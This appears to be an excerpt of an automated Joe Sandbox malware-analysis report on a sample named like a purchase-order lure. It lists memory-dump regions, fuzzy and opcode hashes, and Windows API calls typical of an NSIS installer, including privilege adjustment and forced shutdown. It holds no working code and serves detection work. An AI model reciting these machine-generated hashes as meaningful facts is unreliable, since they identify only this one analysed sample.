                                                  • Instruction Fuzzy Hash: 46218330B00205DFDB15DB78C5557AD3BF1AB4A342F100569D411EF2A0DB368D49CB61
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd9cf946b1686c139aa0b37d411a884081d5630cfb7e8d1c7cb313a74c36fbe3
                                                  • Instruction ID: 0c35caf69ca1a6105354b20d5dba830a2712fb8129d87f18ab53f6c33e1a4b18
                                                  • Opcode Fuzzy Hash: bd9cf946b1686c139aa0b37d411a884081d5630cfb7e8d1c7cb313a74c36fbe3
                                                  • Instruction Fuzzy Hash: 3D214D34A00205CFDB14DB78C959AAE7BF1FF49305F1005A9E816EB3A1DB398D49CB51
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807103983733.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_ad000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1dff3f001384cd7cf65d1c89fa5131fe2473d5a9034a772b7ec1b1454da57918
                                                  • Instruction ID: 1a5306490a9a9a83ee113b8d02038082c2932f96c34daa9f84ebc8f5598c305c
                                                  • Opcode Fuzzy Hash: 1dff3f001384cd7cf65d1c89fa5131fe2473d5a9034a772b7ec1b1454da57918
                                                  • Instruction Fuzzy Hash: 7E2122B0604240DFDB20DF94D980F26BBA1EB85314F24C56AE84A0B642C33BD846CA62
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6cde4f8a3a0e60fd1c58c76a65412c4667c99065e6cf76c5c6ab65af531e5fc2
                                                  • Instruction ID: 1cc1a95f6fff56da71626abf03e3073b3bdb6ffe29cd0183aaefbe0981c4e685
                                                  • Opcode Fuzzy Hash: 6cde4f8a3a0e60fd1c58c76a65412c4667c99065e6cf76c5c6ab65af531e5fc2
                                                  • Instruction Fuzzy Hash: 1D214130E04206DBCB09CFA5E45569EB7B6AF89301F20852AEC25FB390DB719C498B50
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b40000c48e17f9158bf77dc2763c71593cb73b3501f0fd66d8cc4e97ec97bd0f
                                                  • Instruction ID: bb37b9bdbb9973403ea7d22a3142f5bc71ac0c100431ccfae428dc91e4f81cfc
                                                  • Opcode Fuzzy Hash: b40000c48e17f9158bf77dc2763c71593cb73b3501f0fd66d8cc4e97ec97bd0f
                                                  • Instruction Fuzzy Hash: C8214A30B00205DFDB19DB78C5157AE7BF2AB4A342F200469D916EF2A0DB768D09CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23615b48ae8b6136421d1bb169e1cd696f68d2c481da0979d2cd390e3f7e010f
                                                  • Instruction ID: 0d1b140673affbcda537b3c2546cc63df76cbe2648287406e3906500bc35df4f
                                                  • Opcode Fuzzy Hash: 23615b48ae8b6136421d1bb169e1cd696f68d2c481da0979d2cd390e3f7e010f
                                                  • Instruction Fuzzy Hash: 8321C0B0E20101ABDF26DB68C4847593766E786313F004964D817DB258FB34DC4ACB85
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3140c13c100fc91e4596f1bf243af9270871eb3aa5c99d7b79c366b319fdb7a
                                                  • Instruction ID: a18d53adf0bfbfcae1a1bfabe271c73b219eb55fcc4bf36e41e4bf769e80bfde
                                                  • Opcode Fuzzy Hash: e3140c13c100fc91e4596f1bf243af9270871eb3aa5c99d7b79c366b319fdb7a
                                                  • Instruction Fuzzy Hash: F6218475B10115DBDF08DA6AD450B9EB7B7EB84360F148829E409EB344DB71ED428BC4
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f1c42e186aa7ebf38d50803db02bceb7993654e316466ac5d6769a2b00b00160
                                                  • Instruction ID: e6841a3272f9534a2fd783dc471583e05af50f5b4b660a898bb07ee105f8d6ec
                                                  • Opcode Fuzzy Hash: f1c42e186aa7ebf38d50803db02bceb7993654e316466ac5d6769a2b00b00160
                                                  • Instruction Fuzzy Hash: 6B210730A00104CFDB14EB78C959BAE77F1FB49305F100568E816EB3A1EB399D458B51
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6b7ba28ebbac893939fa37f0347a07d20f0c6820ba8b0b7a59af161a216f537
                                                  • Instruction ID: 4c02da4ac03aa41ad63abca9b32782572eb7763cdc4b1376bd8afe2456e76116
                                                  • Opcode Fuzzy Hash: b6b7ba28ebbac893939fa37f0347a07d20f0c6820ba8b0b7a59af161a216f537
                                                  • Instruction Fuzzy Hash: B6119130E00254DFCF22AFB984952AD7BF5EF89312B1804B9D894DB202E735C94AC791
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d72c1f30ca553973eb4b002540b591c46ab1e29877f3f36f96b60cbe642b6bec
                                                  • Instruction ID: 12ac64c5269a47e49d46d8c32128e618e62fbeb1570886f3a2b97c6dfd1fa68b
                                                  • Opcode Fuzzy Hash: d72c1f30ca553973eb4b002540b591c46ab1e29877f3f36f96b60cbe642b6bec
                                                  • Instruction Fuzzy Hash: 571152357046198FDF08DA79DC14A9F73AAEBC9750F018536D405E7340EF65DC068B95
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2f563457df33ad83aaa941378991d135d91274e0b1f1c9414d1ffa94ac20947
                                                  • Instruction ID: cecb9a16ac1f6dfec0d87a02326a1ec5461572f2f980005bbc400a8e12d97bcb
                                                  • Opcode Fuzzy Hash: e2f563457df33ad83aaa941378991d135d91274e0b1f1c9414d1ffa94ac20947
                                                  • Instruction Fuzzy Hash: B201F1357041045BEB14C27D9864B1EBBDAEBCA310F148C3AE10AC7345DE65DC024391
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f90488de3d33985fab5c6b0f966be560ccf2fb65dfe576a796fac942f8ad2014
                                                  • Instruction ID: 28f9e85c0227c00e95e9c8b3a08352b27d6b0628628ad90e8d686c52fb9d1aaa
                                                  • Opcode Fuzzy Hash: f90488de3d33985fab5c6b0f966be560ccf2fb65dfe576a796fac942f8ad2014
                                                  • Instruction Fuzzy Hash: 7A112171F00206AFDF11AFB89C0876E3FB5EB8A351F140126E809E7340EB35C8068B86
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6b10c5bb456748b5d488fd32459918b6ba5089ec0f85cd5511b0734bd2b0d41
                                                  • Instruction ID: 779ad3cb5bc5d51a42b044e80dbd58b0fa07b790901dabefd60a7d92374eb07c
                                                  • Opcode Fuzzy Hash: f6b10c5bb456748b5d488fd32459918b6ba5089ec0f85cd5511b0734bd2b0d41
                                                  • Instruction Fuzzy Hash: 8221C3B1D01619AFCB00DF9AD984A9EFBB4FB49710F50812AE918B7200D374A955CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac9c273567e941aafcd6549fbd9cbf4e96c1f42da6d02d87ecd7683b5a6c99af
                                                  • Instruction ID: e159b641e732c86ef71f2aa93fbf4eb459b98c6ad06caed01f0635105f53d740
                                                  • Opcode Fuzzy Hash: ac9c273567e941aafcd6549fbd9cbf4e96c1f42da6d02d87ecd7683b5a6c99af
                                                  • Instruction Fuzzy Hash: 4701F235B002005BDB0596799460B1F67DBEB8E721F14897AE94ECB349DE24CC038384
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807103983733.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_ad000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08e9da1bfee975e41a947f9fd3b761d780fadb6920dde41b5b9a6d173606086a
                                                  • Instruction ID: 0de1b4fef3dfd476a3e180c929bc3f0faad001b89b00bbbfc82d3f7e22d16828
                                                  • Opcode Fuzzy Hash: 08e9da1bfee975e41a947f9fd3b761d780fadb6920dde41b5b9a6d173606086a
                                                  • Instruction Fuzzy Hash: 72118B75604280DFDB11CF54D584B15FBA2FB85314F28C6AED84A4BA56C33AD84ACB62
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a2b01ed0c7c0f75933c85321e40e7a25229c62c85d2724a6914f76360182edc
                                                  • Instruction ID: d6f0df2d1e67e3ed8a2377359f44916ad2985305f01910e482a8d13a5a6e5a0d
                                                  • Opcode Fuzzy Hash: 1a2b01ed0c7c0f75933c85321e40e7a25229c62c85d2724a6914f76360182edc
                                                  • Instruction Fuzzy Hash: 19016D31E00214DFCF22EFB884416AE7BE5AF48316B14047AD815EB201EB35DC458B91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb7c9be49d5ca61525b180a4aa86cafdc5421bb281b198848bd9ffe36979379f
                                                  • Instruction ID: e45fa04557d17577e3d80bd7657b5b65bb8e6d799011a990c23f773c721f253b
                                                  • Opcode Fuzzy Hash: cb7c9be49d5ca61525b180a4aa86cafdc5421bb281b198848bd9ffe36979379f
                                                  • Instruction Fuzzy Hash: BE21C0B1D01659AFCB00CF9AD984ADEFFB4BF49710F50812AE918A7200C3786954CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bcd5bdabceb44ed846cbeaf23f08140d7c2d5e2193c60924377e86e91431338
                                                  • Instruction ID: 6a86c78df2f9a755cc7c6c794e2be0153eaf665c9f1fc152a98401ab0dad39a8
                                                  • Opcode Fuzzy Hash: 0bcd5bdabceb44ed846cbeaf23f08140d7c2d5e2193c60924377e86e91431338
                                                  • Instruction Fuzzy Hash: 1B01A935B040149BEB18D6BE9458B1EB6CFEBCA720F248839E10ACB344DEA5DC024395
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5af708719497be3d69566d1f27e8a6269e03773bc428c7e801cf92244f67781c
                                                  • Instruction ID: f0f312492b5f2c854e72d5a2b79907888a44a08554eff17d1be0e5e5d6e627d0
                                                  • Opcode Fuzzy Hash: 5af708719497be3d69566d1f27e8a6269e03773bc428c7e801cf92244f67781c
                                                  • Instruction Fuzzy Hash: 3701D63168C163DAEB2780D544A127933605B7532FB96407AD86CDF48BE300C94DC3A2
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc6c8d61c17df20c183e48d36d751a18221b0512e9fc75e403d827c64cc09f89
                                                  • Instruction ID: 1ffb33ba87ecd945834159257c57ddd8ea90c6e7e169dcd05084b8c83d440efc
                                                  • Opcode Fuzzy Hash: dc6c8d61c17df20c183e48d36d751a18221b0512e9fc75e403d827c64cc09f89
                                                  • Instruction Fuzzy Hash: FA016935B001145BEB189A7E94A4B1F77DAEBCD761F108939E94ACB348DE65DC034385
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e699d919e53f38179b8c6649b7f1db7848f878781b3d2628b573f8d822d085ef
                                                  • Instruction ID: 0b1afe7bad81e070622d3eeba5906faf82675eb8d93cb0c4ba3e679b65811d1e
                                                  • Opcode Fuzzy Hash: e699d919e53f38179b8c6649b7f1db7848f878781b3d2628b573f8d822d085ef
                                                  • Instruction Fuzzy Hash: 6C014639B0025A8FEB12527AD51164E33D7EFC2361F000CBAE046DB349DB61DC478391
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 799651d2e84a8299ef9b14d126d2438daaddb8e727450ad384df670304df40a7
                                                  • Instruction ID: e51464785c17de80ff10b87049bfcc7644a08630b40210819123c13f4db72aa9
                                                  • Opcode Fuzzy Hash: 799651d2e84a8299ef9b14d126d2438daaddb8e727450ad384df670304df40a7
                                                  • Instruction Fuzzy Hash: ECF0A03AE10228D7EB149976E8419CBB77AF784751F104839ED11F7244DBB1A8058BD0
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00008001), ref: 004033FB
                                                  • GetVersionExA.KERNEL32(?), ref: 00403424
                                                  • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                                  • OleInitialize.OLE32(00000000), ref: 00403548
                                                  • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                                  • GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                                  • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                                  • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                                  • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                                  • lstrcatA.KERNEL32(00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                                  • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                                  • lstrcatA.KERNEL32(00436400,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000008,0000000A,0000000C), ref: 00403700
                                                  • DeleteFileA.KERNEL32(00436000,?,00000008,0000000A,0000000C), ref: 00403714
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                                  • ExitProcess.KERNEL32 ref: 004037E0
                                                  • lstrlenA.KERNEL32(00436400,00435000,00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                                  • wsprintfA.USER32 ref: 00403846
                                                  • GetFileAttributesA.KERNEL32(00431400,00436400,00431400,?,0000000C), ref: 00403878
                                                  • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                                  • SetCurrentDirectoryA.KERNEL32(00436400,00436400,00431400,?,0000000C), ref: 004038B0
                                                  • CopyFileA.KERNEL32(00436C00,00431400,00000001), ref: 004038C6
                                                  • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                                  • ExitProcess.KERNEL32 ref: 004039B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                                  • String ID: "$A$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K@v$~nsu%X.tmp
                                                  • API String ID: 2956269667-3096171558
                                                  • Opcode ID: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                                  • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                                  • Opcode Fuzzy Hash: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                                  • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                                                  APIs
                                                  • DeleteFileA.KERNEL32(?,?,763F3410,00436400,00435000), ref: 00405A78
                                                  • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,763F3410,00436400,00435000), ref: 00405AC0
                                                  • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,763F3410,00436400,00435000), ref: 00405AE1
                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,763F3410,00436400,00435000), ref: 00405AE7
                                                  • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,763F3410,00436400,00435000), ref: 00405AF8
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                                  • FindClose.KERNEL32(00000000), ref: 00405BB6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: \*.*
                                                  • API String ID: 2035342205-1173974218
                                                  • Opcode ID: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                                  • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                                  • Opcode Fuzzy Hash: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                                  • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q
                                                  • API String ID: 0-3831391056
                                                  • Opcode ID: 348f0a3195ec1f61bd4c2a151a414b6b67cfc7365e4cc1ac1b25e72203be64a5
                                                  • Instruction ID: ad6b019ca586277b371f1e4d590a9cce0e7fe928672c95d76f9d34fb5194700c
                                                  • Opcode Fuzzy Hash: 348f0a3195ec1f61bd4c2a151a414b6b67cfc7365e4cc1ac1b25e72203be64a5
                                                  • Instruction Fuzzy Hash: 2F122C74A04619CFDF14DFA9C854A9DB7F2BF89300F2089A9D406AB395DBB09D45CF81
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                                  • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                                  • DeleteObject.GDI32(00000110), ref: 00404E33
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                                    • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404545), ref: 00404370
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                                  • ShowWindow.USER32(?,00000005), ref: 00404F94
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                                  • GlobalFree.KERNEL32(?), ref: 00405172
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                                  • ShowWindow.USER32(?,00000000), ref: 0040531C
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                                  • ShowWindow.USER32(00000000), ref: 0040532E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: c4a55ea5c543b5086f26064fedb30d068b786e8e21ddca1fa1d8d22dd1bc26e7
                                                  • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                                  • Opcode Fuzzy Hash: c4a55ea5c543b5086f26064fedb30d068b786e8e21ddca1fa1d8d22dd1bc26e7
                                                  • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040557D
